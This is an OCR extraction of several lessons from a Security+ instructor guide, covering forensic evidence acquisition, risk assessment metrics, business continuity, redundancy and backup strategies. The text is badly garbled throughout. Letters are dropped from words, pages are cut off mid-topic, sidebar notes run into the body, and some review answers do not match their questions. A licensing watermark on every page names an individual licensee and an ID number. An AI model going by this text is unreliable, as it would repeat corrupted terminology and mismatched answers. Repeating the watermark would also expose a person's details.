cryptographic keys, and more. It can also be a means of accessing data that is carbon black with
encrypted when stored on a mass storage device. There are various methods of volatility for detecting
collecting the contents of system memory. memory attacks .
LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
492 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)
iewing the process list in a memory dump using the olatility ramework.
(Screenshot olatility ramework volatilityfoundation.org.)
Live Acquisition
A specialist hardware or software tool can capture the contents of memory while the
host is running. nfortunately, this type of tool needs to be preinstalled as it re uires a
kernel mode driver to dump any data of interest. ome e amples for indows include
WinHex ( ways.net winhe , Memory e from ire ye fireeye.com services freeware
memory e.html , and esponse TACTICAL f response.com software tac .
On Linux, a user mode tool, such as memdump (porcupine.org forensics tct.html
or dd, can be run against the /dev/mem device file. owever, on most modern
distributions, access to this file is blocked. The olatility ramework github.com
volatilityfoundation/volatility includes a tool to install a kernel driver pmem .
The fmem and LiM kernel utilities provide similar functionality.
Crash Dump
hen indows encounters an unrecoverable kernel error, it can write contents of
memory to a dump file at C indows M M .DM . n modern systems, there is
unlikely to be a complete dump of all the contents of memory, as these could take up
a lot of disk space. owever, even mini dump files, stored in C indows Minidumps,
may be a valuable source of information.
LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
The Official CompTIA Security+ Instructor Guide (Exam SY0-601) | 493
The pagefile swap file swap partition stores pages of memory in use that e ceed
the capacity of the host's AM modules. The pagefile is not structured in a way that
analysis tools can interpret, but it is possible to search for strings.
Disk image ac uisition refers to ac uiring data from nonvolatile storage. Nonvolatile Disk Image Acquisition
storage includes hard disk drives DDs , solid state drives Ds , firmware, other
types of ash memory thumb drives and memory cards , and optical media CD,
D D, and lu ay . This can also be referred to as device ac uisition, meaning the D
storage in a smartphone or media player. Disk ac uisition will also capture the
installation, if the boot volume is included.
There are three device states for persistent storage ac uisition
• Live ac uisition this means copying the data while the host is still running. This
may capture more evidence or more data for analysis and reduce the impact on
overall services, but the data on the actual disks will have changed, so this method
may not produce legally acceptable evidence. It may also alert the adversary and
allow time for them to perform anti forensics.
• tatic ac uisition by shutting down the host this runs the risk that the malware will
detect the shutdown process and perform anti forensics to try to remove traces of
itself.
• tatic ac uisition by pulling the plug this means disconnecting the power at the
wall socket not the hardware power o button . This is most likely to preserve the
storage devices in a forensically clean state, but there is the risk of corrupting data.
iven sufficient time at the scene, you may decide to perform both a live and static
ac uisition. hichever method is used, it is imperative to document the steps taken
and supply a timeline for your actions.
There are many I imaging utilities, including those packaged with suites such as the
orensic Toolkit and its T Imager. ou should note that the nCase forensics suite
uses a vendor file format .e compared to the raw file format used by Linu tools
like dd. The file format is important when it comes to selecting a tool for analy ing the
image. The .eo format allows image metadata such as the checksum, drive geometry,
and ac uisition time to be stored within the same file. The open source Advanced
orensic ormat A provides similar features.
If no specialist tool is available, on a Linu host you can use the dd command to make
a copy of an input file if= to an output file of= and apply optional conversions to
the file data. In the following sda is the fi ed drive
dd if=/dev/sda of=/mnt/usbstick/backup.img
A more recent fork of dd is dc dd, which provides additional features like multiple
output files and e act match verification.
LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
494 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)
3. A second hash is then made of the image, which should match the original hash
of the media.
4. A copy is made of the reference image, validated again by the checksum. Analysis
is performed on the copy.
This proof of integrity ensures non repudiation. If the provenance of the evidence
is certain, the threat actor identified by analysis of the evidence cannot deny their
actions. The checksums prove that no modification has been made to the image.
In practical terms, the image ac uisition software will perform the verification steps as part
of the ac uisition process, but in theory you could use separate tools to perform each stage
individually.
Preservation of Evidence
The host devices and media taken from the crime scene should be labeled, bagged,
and sealed, using tamper evident bags. It is also appropriate to ensure that the
bags have antistatic shielding to reduce the possibility that data will be damaged
or corrupted on the electronic media by electrostatic discharge D . ach piece of
evidence should be documented by a chain of custody form which records where,
when, and who collected the evidence, who subse uently handled it, and where it
was stored.
The evidence should be stored in a secure facility this not only means access control,
but also environmental control, so that the electronic systems are not damaged by
condensation, D, fire, and other ha ards. imilarly, if the evidence is transported, the
transport must also be secure.
LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
The Official CompTIA Security+ Instructor Guide (Exam SY0-601) | 495
Network
acket captures and traffic ows can contain very valuable evidence, if the capture was
running at the right time and in the right place to record the incident. As with memory
forensics, the issue for forensics lies in establishing the integrity of the data. Most
network data will come from a I M.
Cache
Cache can refer either to hardware components or software. oftware based cache is
stored in the file system and can be ac uired as part of a disk image. or e ample, each
brower has a cache of temporary files, and each user profile has a cache of temp files.
ome cache artifacts generated by the and applications are held in memory only,
such as portions of the registry, cryptographic keys, password hashes, some types of
cookies, and so on. The contents of hardware cache C registers and disk controller
read write cache, for instance is not generally recoverable.
Using Autopsy for file carving a disk image. The selected Courses folder and the P files in it were deleted
and so are agged as unallocated. ecause this image was captured soon after deletion, the file contents
are easily recoverable, however. (Screenshot Autopsy the Sleuth it sleuthkit.org autopsy.)
Snapshot
A snapshot is a live ac uisition image of a persistent disk. hile this may have less
validity than an image taken from a device using a write blocker, it may be the only
means of ac uiring data from a virtual machine or cloud process.
LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
496 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)
Firmware
irmware is usually implemented as ash memory. ome types, such as the C
firmware, can potentially be e tracted from the device or from system memory using
an imaging utility. It likely will be necessary to use specialist hardware to attach the
device to a forensic workstation, however.
• Chain of custody issues are comple and might have to rely on the C to select and
package data for you. The process should be documented and recorded as closely
as is possible.
• Jurisdiction and data sovereignty may restrict what evidence the C is willing to
release to you.
• If the C is a data processor, it will be bound by data breach notification laws and
regulations. Coordinating the timing of notification and contact with the regulator
between your organi ation and the C can be e tremely comple , especially if
there is an ongoing incident re uiring confidentiality.
LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
The Official CompTIA Security+ Instructor Guide (Exam SY0-601) | 497
Review Activity:
igital orensics E idence Ac uisition
Answer the following questions:
1. You must recover the contents of the ARP cache as vital evidence of a man-
in-the-middle attack. Should you shut down the PC and image the hard drive
to preser e it
No, the A cache is stored in memory and will be discarded when the computer is
powered o . ou can either dump the system memory or run the arp utility and make
a screenshot. In either case, make sure that you record the process and e plain your
actions.
2. Which command line tool allows image creation from disk media on any
inu host
True.
A carving tool allows close inspection of an image to locate artifacts. Artifacts are data
ob ects and structures that are not obvious from e amination by ordinary file browsing
tools, such as alternate data streams, cache entries, and deleted file remnants.
LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
498 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)
Lesson 18
Summary
Teaching ou should be able to e plain key aspects of digital forensics, including the secure
Tip ac uisition and handling of evidence.
Check that students
are confident about
the content that has
Guidelines for Digital Forensics
been covered. If there Follow these guidelines for supporting forensics investigations:
is time, revisit any
content examples that • Develop or adopt a consistent process for incident responders to handle and
they have questions preserve forensic data:
about. If you have
used all the available • Consider the order of volatility and potential loss of evidence if a host is shut
time for this lesson
down or powered o .
block, note the issues,
and schedule time for
• Record evidence collection using video and interview witnesses to gather
a review later in the
course. statements.
LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
Lesson 19
Summarizing Risk
anagement oncepts
Lesson Objectives
In this lesson, you will:
• plain risk management processes and concepts.
LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
500 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)
Topic A
Explain isk anagement
rocesses and oncepts
2. Identify vulnerabilities for each function or work ow starting with the most
critical , analy e systems and assets to discover and list any vulnerabilities or
weaknesses to which they may be susceptible.
3. Identify threats for each function or work ow, identify the threat sources and
actors that may take advantage of or e ploit or accidentally trigger vulnerabilities.
or each business process and each threat, you must assess the degree of risk that
e ists. Calculating risk is comple , but the two main variables are likelihood and impact
• Likelihood of occurrence is the probability of the threat being reali ed.
• Impact is the severity of the risk if reali ed as a security incident. This may be
determined by factors such as the value of the asset or the cost of disruption if the
asset is compromised.
LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
The Official CompTIA Security+ Instructor Guide (Exam SY0-601) | 501
isk management is comple and treated very di erently in companies and institutions
of di erent si es, and with di erent regulatory and compliance re uirements. Most
companies will institute enterprise risk management (ERM) policies and procedures,
based on frameworks such as NI T's isk Management ramework M or I .
These legislative and framework compliance re uirements are often formali ed as
a isk and Control elf Assessment C A . An organi ation may also contract an
e ternal party to lead the process, in which case it is referred to as a isk and Control
Assessment CA .
A C A is an internal process undertaken by stakeholders to identify risks and the
e ectiveness with which controls mitigate those risks. C As are often performed
through uestionnaires and workshops with department managers. The outcome of an
C A is a report. p to date C A reports are critical to the e ternal audit process.
eneral types of risks can be identified as arising from specific threat and vulnerability isk Types
scenarios.
External
ternal threat actors are one highly visible source of risk. ou must also consider
wider threats than those of cyberattack. Natural disasters, such as the C ID
pandemic, illustrate the need to have IT systems and work ows that are resilient to
widespread dislocation. The most critical type of impact is one that could lead to loss
of life or critical in ury. The most obvious risks to life and safety come from natural
disasters, person made disasters, and accidents, such as fire.
Internal
Internal risks come from assets and work ows that are owned and managed by your
organi ation. hen reviewing internal risks, it is important to remember that these can
be classed as malicious and accidental or non malicious. Internal threats can include
contractors granted temporary access.
Multiparty
Multiparty risk is where an adverse event impacts multiple organi ations. Multiparty
risk usually arises from supplier relationships. If a critical event disrupts a supplier or
customer, then your own organi ation will su er. These are often described as ripple
impacts. or e ample, if one of your top five customers goes out of business because
of a data breach, your company will lose substantial revenue. rgani ations in these
supply chain relationships have an interest in promoting cybersecurity awareness and
capability throughout the chain.
As an illustration of how risk assessments can change in view of multiparty
relationship, consider a company that makes wireless adapters, originally for use
with laptops. In the original usage, the security of the firmware upgrade process is
important, but it has no impact on life or safety. The company, however, earns a
new contract to supply the adapters to provide connectivity for in vehicle electronics
systems. nknown to the company, a weakness in the design of the in vehicle system
allows an adversary to use compromised wireless adapter firmware to a ect the car's
control systems. The integrity of the upgrade process now has an impact on safety, and
is much higher risk.
LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
502 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)
music and product designs and patents. If I data is e filtrated it will lose much of its
commercial value. Losses can be very difficult to recover in territories where there are
not strong legal protections.
Software Compliance/Licensing
reaking the terms of the end user licensing agreement LA that imposes conditions
on installation of the software can e pose the computer owner to substantial fines.
License issues are most likely to arise from shadow IT, where users install software
without change control approval. Network inventory management suites can report
software installations on each host and correlate those with the number of license
seats purchased. Licensing models can also be comple , especially where virtuali ation
and the cloud are concerned. It is important to train the administrative sta on the
specific license terms for each product.
Legacy Systems
Legacy systems are a source of risk because they no longer receive security updates
and because the expertise to maintain and troubleshoot them is a scarce resource.
Teaching
Tip
Students need to learn
these metrics.
uantitative risk assessment aims to assign concrete values to each risk factor. (Image 1 .com.)
uantitative risk assessment aims to assign concrete values to each risk factor.
• Single Loss Expectancy (SLE) the amount that would be lost in a single
occurrence of the risk factor. This is determined by multiplying the value of the
asset by an Exposure Factor (EF). is the percentage of the asset value that would
be lost.
LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
The Official CompTIA Security+ Instructor Guide (Exam SY0-601) | 503
• Annualized Loss Expectancy (ALE)—the amount that would be lost over the
course of a year. This is determined by multiplying the L by the Annualized Rate
of Occurrence (ARO).
It is important to reali e that the value of an asset does not refer solely to its material
value. The two principal additional considerations are direct costs associated with the
asset being compromised downtime and conse uent costs to intangible assets, such
as the company's reputation. For example, a server may have a material cost of a few
hundred dollars. If the server were stolen, the costs incurred from not being able to
do business until it can be recovered or replaced could run to thousands of dollars.
In addition, that period of interruption where orders cannot be taken or go unfulfilled
leads customers to look at alternative suppliers, resulting in perhaps more thousands
of lost sales and goodwill.
The problem with uantitative risk assessment is that the process of determining and
assigning these values is comple and time consuming. The accuracy of the values
assigned is also difficult to determine without historical data often, it has to be based
on sub ective guesswork . owever, over time and with e perience, this approach can
yield a detailed and sophisticated description of assets and risks and provide a sound
basis for ustifying and prioriti ing security e penditure.
ualitative risk assessment avoids the comple ity of the uantitative approach and Qualitative Risk
is focused on identifying significant risk factors. The ualitative approach seeks out Assessment
people's opinions of which risk factors are significant. Assets and risks may be placed
in simple categories. or e ample, assets could be categori ed as Irreplaceable, igh
alue, Medium alue, and Low alue risks could be categori ed as one o or recurring
and as Critical, igh, Medium, and Low probability.
Another simple approach is the heat map or Traffic Light impact matri . or each risk,
a simple Red, Yellow, or Green indicator can be put into each column to represent the
severity of the risk, its likelihood, cost of controls, and so on. This approach is simplistic
but does give an immediate impression of where e orts should be concentrated to
improve security.
LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
504 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)
In the uantitative approach, the eturn on Security Investment ( OSI) can be determined
by calculating a new A E, based on the reduction in loss that will be created by the security
controls introduced. The formula for calculating OSI is (A E A Em) Cost of Solution
Cost of Solution, where A E is the A E before controls and A Em is after controls.
LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
The Official CompTIA Security+ Instructor Guide (Exam SY0-601) | 505
the revenue and withdraw it from sale. bviously this would generate considerable bad
feeling among e isting customers. Avoidance is not often a credible option.
Transference (or sharing) means assigning risk to a third party, such as an insurance
company or a contract with a supplier that defines liabilities. or e ample, a company
could stop in house maintenance of an e commerce site and contract the services to
a third party, who would be liable for any fraud or data theft. pecific cybersecurity
insurance or cyberliability coverage protects against fines and liabilities arising from
data breaches and Do attacks.
ote that in this sort of case it is relatively simple to transfer the obvious risks, but risks to
the company s reputation remain. If a customer s credit card details are stolen because
they used your unsecure e-commerce application, the customer won t care if you or a third
party were nominally responsible for security. It is also unlikely that legal liabilities could be
completely transferred in this way. or example, insurance terms are likely to re uire that
best practice risk controls have been implemented.
It is not possible to reduce risks to ero, so part of risk posture is concerned with Risk Acceptance and
managing what risks remain. Risk Appetite
Control Risk
Control risk is a measure of how much less e ective a security control has become
over time. or e ample, antivirus became uite capable of detecting malware on the
basis of signatures, but then less e ective as threat actors started to obfuscate code.
Control risk can also refer a security control that was never e ective in mitigating
inherent risk. This illustrates the point that risk management is an ongoing process,
re uiring continual reassessment and re prioriti ation.
To ensure that the business stakeholders understand each risk scenario, you should Risk Awareness
articulate it such that the cause and e ect can clearly be understood by the owner
of the asset. A Do risk should be put into plain language that describes how the risk
would occur and, as a result, what access is being denied to whom, and the e ect to
the business. or e ample As a result of malicious or hacking activity against the
public website, the site may become overloaded, preventing clients from accessing
their client order accounts. This will result in a loss of sales for so many hours and a
potential loss of revenue of so many dollars."
LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
506 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)
LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
The Official CompTIA Security+ Instructor Guide (Exam SY0-601) | 507
e ie Acti ity
Risk Management
rocesses and oncepts
Answer the following uestions
You need to examine supply chain dependencies to identify how problems with one
or more suppliers would impact your business. You also need to examine customer
relationships to determine what liabilities you have in the event of an incident
impacting your ability to supply a product or service and what impact disruption
of important customer accounts would have, should cyber incidents disrupt their
business.
The risk as determined by impact and likelihood compared to the cost of the control.
This metric can be calculated as eturn on ecurity Investment I.
Risk transference.
Control risk arises when a security control is ine ective at mitigating the impact and or
likelihood of the risk factor it was deployed to mitigate. The control might not work as
hoped, or it might become less e ective over time.
LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
508 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)
Topic
Explain usiness Impact
Analysis oncepts
The term continuity of operations planning (COOP) refers to the same sorts of activities
when undertaken by a government agency, rather than a business.
LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
The Official CompTIA Security+ Instructor Guide (Exam SY0-601) | 509
to hours for critical functions, hours for urgent functions, seven days for normal
functions, and so on. MTDs vary by company and event. ach function may be
supported by multiple systems and assets. The MTD sets the upper limit on the
amount of recovery time that system and asset owners have to resume operations.
or e ample, an organi ation speciali ing in medical e uipment may be able to
e ist without incoming manufacturing supplies for three months because it has
stockpiled a si able inventory. After three months, the organi ation will not have
sufficient supplies and may not be able to manufacture additional products,
therefore leading to failure. In this case, the MTD is three months.
• Recovery time objective (RTO) is the period following a disaster that an individual
IT system may remain o ine. This represents the amount of time it takes to identify
that there is a problem and then perform recovery (restore from backup or switch
in an alternative system, for instance .
• Recovery Point Objective (RPO) is the amount of data loss that a system can
sustain, measured in time. That is, if a database is destroyed by a virus, an of
hours means that the data can be recovered from a backup copy to a point not
more than 24 hours before the database was infected.
or e ample, a customer leads database might be able to sustain the loss of a few
hours' or days' worth of data the salespeople will generally be able to remember
who they have contacted and rekey the data manually . Conversely, order processing
may be considered more critical, as any loss will represent lost orders and it may be
impossible to recapture web orders or other processes initiated only through the
computer system, such as linked records to accounting and fulfillment.
MTD and help to determine which business functions are critical and also to
specify appropriate risk countermeasures. or e ample, if your is measured in
LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
510 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)
days, then a simple tape backup system should suffice if is ero or measured in
minutes or seconds, a more expensive server cluster backup and redundancy solution
will be re uired.
• The calculation for MT is the total time divided by the number of failures. or
e ample, if you have devices that run for hours and two of them fail, the
MT is hours failure .
• The calculation for MTT for the same test is the total time divided by the
number of devices, so , with the result being hours failure.
LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
The Official CompTIA Security+ Instructor Guide (Exam SY0-601) | 511
• Mean time to repair (MTTR) is a measure of the time taken to correct a fault so
that the system is restored to full operation. This can also be described as mean
time to replace or recover. This metric is important in determining the overall
recovery time ob ective T .
IST has published a guide to resiliency and IT contingency planning (SP 00- ), available
at nvlpubs.nist.gov nistpubs egacy SP nistspecialpublication 00- r1.pdf.
In terms of business continuity, a disaster is an event that could threaten mission Disasters
essential functions. For example, a privacy breach is a critical incident, but it is probably
not a direct threat to business functions. An earth uake that destroys a data center
is a disaster level event. Disaster response involves many of the same principles and
procedures as incident response, but at a larger scale.
Person-Made
A person made disaster event is one where human agency is the primary cause.
Typical e amples other than devastating cybersecurity incidents include terrorism, war,
vandalism, pollution, and arson. There can also be accidental person made disasters,
such as cutting through power or telecoms cabling.
Environmental
An environmental disaster, or natural disaster, is one that could not be prevented
through human agency. nvironmental disasters include river or sea oods,
earth uakes, storms, disease, and so on. Natural disasters may be uite predictable
as is the case with areas prone to ooding or storm damage or une pected, and
therefore difficult to plan for.
ost natural or environmental disasters can also have a human or artificial source. or
example, ooding might be more likely because dams are not ade uately maintained a
wildfire could be the result of arson or poorly maintained power infrastructure.
• isk from disruption to utilities, such as electricity, water, and transportation. These
risks are higher in geographically isolated sites.
LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
512 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)
• hich functions are most critical here should e ort first be concentrated
• hat resources are available hould they be pre purchased and held in stock
ill the disaster a ect availability of supplies
3. Train sta in the disaster planning procedures and how to react well to change.
As well as restoring systems, the disaster recovery plan should identify stakeholders
who need to be informed about incidents with impacts to life and safety. There may
be a legal re uirement to inform the police, fire service, or building inspectors about
any safety related or criminal incidents. If third party or personal data is lost or stolen,
the data sub ects may need to be informed. If the disaster a ects services, customers
need to be informed about the time to fi and any alternative arrangements that can
be made.
• Tabletop e ercises sta ghost the same procedures as they would in a disaster,
without actually creating disaster conditions or applying or changing anything.
These are simple to set up but do not provide any sort of practical evidence of
things that could go wrong, time to complete, and so on.
• ull scale e ercises action based sessions that re ect real situations, these
e ercises are held onsite and use real e uipment and real personnel as much as
possible. ull scale e ercises are often conducted by public agencies, but local
organi ations might be asked to participate.
LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
The Official CompTIA Security+ Instructor Guide (Exam SY0-601) | 513
e ie Acti ity
usiness Impact Analysis oncepts
Answer the following uestions
2. True or false? RTO expresses the amount of time required to identify and
resolve a problem within a single system or asset.
True.
A discussion based drill of emergency response procedures. ta may role play and
discuss their responses but actual emergency conditions are not simulated.
ull scale or functional e ercises can identify mistakes in the plan that might not be
apparent when drafting procedures. It also helps to familiari e sta with the plan.
LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
514 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)
Lesson 19
Summary
Teaching ou should be able e plain risk management, business impact analysis, and disaster
Tip recovery planning processes and metrics.
Check that students
are confident about
the content that has
Guidelines for Risk Management
been covered. If there ollow these guidelines for supporting risk management assessment
is time, revisit any
content examples that • Analy e work ows to determine M s and s and the assets that support them,
they have uestions using metrics such as MTT MT and MTT .
about. If you have
used all the available • Identify threat and disaster scenarios, accounting for internal versus e ternal,
time for this lesson
environmental, person made, site specific risk assessment, multiparty, software
block, note the issues,
and schedule time for licensing compliance, I theft, and legacy systems.
a review later in the
course. • rioriti ing M s, perform business impact analysis to determine inherent risk
likelihood and impacts for di erent threat and disaster scenarios, using metrics
such as L , A , and AL .
• Define MTD, T , and for each function and or critical system and apply a risk
remediation techni ue mitigation, transference, avoidance, or acceptance that
meets these targets.
• erform ongoing risk monitoring to determine residual risk and control risk.
LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
Lesson 20
Implementing Cybersecurity Resilience
LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
516 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)
Topic 20A
Implement Redundancy Strategies
Downtime is calculated from the sum of scheduled service intervals plus unplanned outages over
the period.
System availability can refer to an overall process, but also to availability at the level of a
server or individual component.
LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
The Official CompTIA Security+ Instructor Guide (Exam SY0-601) | 517
lasticity refers to the system's ability to handle these changes on demand in real
time. A system with high elasticity will not e perience loss of service or performance if
demand suddenly increases rapidly.
All types of computer systems re uire a stable power supply to operate. lectrical ower edundancy
events, such as voltage spikes or surges, can crash computers and network appliances,
while loss of power from brownouts or blackouts will cause e uipment to fail. ower
management means deploying systems to ensure that e uipment is protected against
these events and that network operations can either continue uninterrupted or be
recovered uickly.
ual o er upplies
An enterprise class server or appliance enclosure is likely to feature two or more power
supply units s for redundancy. A hot plug can be replaced in the event of
failure without powering down the system.
LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
518 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)
Generators
A backup power generator can provide power to the whole building, often for several
days. Most generators use diesel, propane, or natural gas as a fuel source. ith diesel
and propane, the main drawback is safe storage diesel also has a shelf life of between
months and two years with natural gas, the issue is the reliability of the gas
supply in the event of a natural disaster. Data centers are also investing in renewable
power sources, such as solar, wind, geothermal, hydrogen fuel cells, and hydro. The
ability to use renewable power is a strong factor in determining the best site for new
data centers. Large scale battery solutions, such as Tesla's owerpack tesla.com
powerpack , may be able to provide an alternative to backup power generators. There
are also emerging technologies to use all the battery resources of a data center as a
microgrid for power storage scientificamerican.com article how big batteries at data
centers could replace power plants .
A UPS is always required to protect against any interruption to computer services. A backup
generator cannot be brought online fast enough to respond to a power failure.
For the system to be fault tolerant, the higher bandwidth must not be critical to the function.
Multiple switching paths require use of Spanning Tree Protocol (STP) to prevent loops.
Load Balancers
NIC teaming provides load balancing at the adapter level. Load balancing and
clustering can also be provisioned at a service level
• A load balancing switch distributes workloads between available servers.
• A load balancing cluster enables multiple redundant servers to share data and
session information to maintain a consistent service if there is failover from one
server to another.
LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
The Official CompTIA Security+ Instructor Guide (Exam SY0-601) | 519
Disk and storage resources are critically dependent on redundancy. hile backup provides Disk edundancy
integrity for when a disk fails, to restore from backup would re uire installing a new
storage unit, restoring the data, and testing the system configuration. Disk redundancy
ensures that a server can continue to operate if one, or possibly more, storage devices fail.
RAID level 0 refers to striping without parity. Data is written in blocks across several disks
simultaneously, but with no redundancy. This can improve performance, but if one disk
fails, so does the whole volume, and data on it will be corrupted. There are some use cases
for RAID 0, but typically striping without parity is only implemented to improve performance
in a nested RAID solution.
Multipath
here AID provides redundancy for the storage devices, multipath is focused on
the bus between the server and the storage devices or AID array. A storage system is
accessed via some type of controller. The controller might be connected to disk units
locally installed in a server, or it might connect to storage devices within a storage area
network AN . Multipath input ouput I ensures that there is controller redundancy
and or multiple network paths to the storage devices.
LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
520 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)
Geographical Dispersal
Geographical dispersal refers to data replicating hot and warm sites that are
physically distant from one another. This means that data is protected against a
natural disaster wiping out storage at one of the sites. This is also described as a geo
redundant solution.
LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
The Official CompTIA Security+ Instructor Guide (Exam SY0-601) | 521
Review Activity:
Redundancy Strategies
Answer the following uestions
The ma imum tolerable downtime MTD metric e presses the availability re uirement
for a particular business function.
Aside from AID , AID provides redundancy between a group of disks, so that if one
disk were to fail, that data may be recoverable from the other disks in the array.
LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
522 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)
Topic 20B
Implement Backup Strategies
Show Slide(s)
Backups and Retention Policy
very business continuity and disaster recovery plan makes use of backups, of one
ackups and type or another. The e ecution and fre uency of backups must be carefully planned
etention olicy and guided by policies. Data retention needs to be considered in the short and long
term
• In the short term, files that change fre uently might need retaining for version
control. hort term retention is also important in recovering from malware
infection. Consider the scenario where a backup is made on Monday, a file is
infected with a virus on Tuesday, and when that file is backed up later on Tuesday,
the copy made on Monday is overwritten. This means that there is no good means
of restoring the uninfected version of the file. hort term retention is determined by
how often the youngest media sets are overwritten.
• In the long term, data may need to be stored to meet legal re uirements or to
comply with company policies or industry standards. Any data that must be retained
in a particular version past the oldest sets should be moved to archive storage.
LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
The Official CompTIA Security+ Instructor Guide (Exam SY0-601) | 523
Performing a backup using Acronis Backup. (Screenshot used with permission from Acronis.)
or these reasons, backups are kept back to certain points in time. As backups take up
a lot of space, and there is never limitless storage capacity, this introduces the need for
storage management routines to reduce the amount of data occupying backup storage
media while giving ade uate coverage of the re uired recovery window. The recovery
window is determined by the recovery point ob ective , which is determined
through business continuity planning. Advanced backup software can prevent media
sets from being overwritten in line with the specified retention policy.
acking up a domain controller using Acronis backup The ow ong to eep field specifies the
retention period. (Screenshot used with permission from Acronis.)
LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
524 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)
inux doesn t support a file archive attribute. Instead, a date stamp is used to determine
whether the file has changed.
Backup/Restore
Type Data Selection Archive Attribute
Time
ull All selected data igh low one tape Cleared
regardless of when set
it was previously
backed up
Incremental New files, as well as Low high multiple Cleared
files modified since tape sets
the last backup
Di erential All new and modi Moderate moderate Not Cleared
fied files since the no more than two
last full backup sets
LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
The Official CompTIA Security+ Instructor Guide (Exam SY0-601) | 525
The factors that determine which method to use are the time it takes to restore versus
the time it takes to back up. Assuming a backup is performed every working day, an
incremental backup only includes files changed during that day, while a di erential
backup includes all files changed since the last full backup. Incremental backups save
backup time but can be more time consuming when the system must be restored. The
system must be restored from the last full backup set and then from each incremental
backup that has subse uently occurred. A di erential backup system only involves two
tape sets when restoration is re uired.
o not combine differential and incremental backups. Use full backups interspersed with
differential backups or full backups interspersed with incremental backups.
Copy Backups
Most software also has the capability to do copy backups. These are made outside the
tape rotation system and do not a ect the archive attribute.
napshots are a means of getting around the problem of open files. If the data that napshots and Images
you're considering backing up is part of a database, such as L data or an change
messaging system, then the data is probably being used all the time. ften copy based
mechanisms will be unable to back up open files. hort of closing the files, and so too
the database, a copy based system will not work. A snapshot is a point in time copy
of data maintained by the file system. A backup program can use the snapshot rather
than the live data to perform the backup. In indows, snapshots are provided for on
NT volumes by the Volume Shadow Copy Service (VSS). They are also supported on
un's file system, and under some enterprise distributions of Linu .
Configuring SS settings in Acronis ackup. (Screenshot used with permission from Acronis.)
LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
526 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)
irtual system managers can usually take snapshot or cloned copies of Ms. A
snapshot remains linked to the original M, while a clone becomes a separate M from
the point that the cloned image was made.
An image backup is made by duplicating an installation. This can be done either
from a physical hard disk or from a M's virtual hard disk. Imaging allows the system
to be redeployed uickly, without having to reinstall third party software, patches, and
configuration settings. A system image should generally not contain any user data files,
as these will uickly become out of date.
Teaching
Tip
These technologies Backup Media Types
should be familiar to
students from A and A backup operation can use several media types. ach type has advantages and
Network . disadvantages that make it more or less suitable for given scenarios.
LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
The Official CompTIA Security+ Instructor Guide (Exam SY0-601) | 527
Disk
Individual removable hard drives are an e cellent low cost option for network
backups, but they do not have sufficient capacity or e ibility to be used within an
automated enterprise backup solution.
Tape
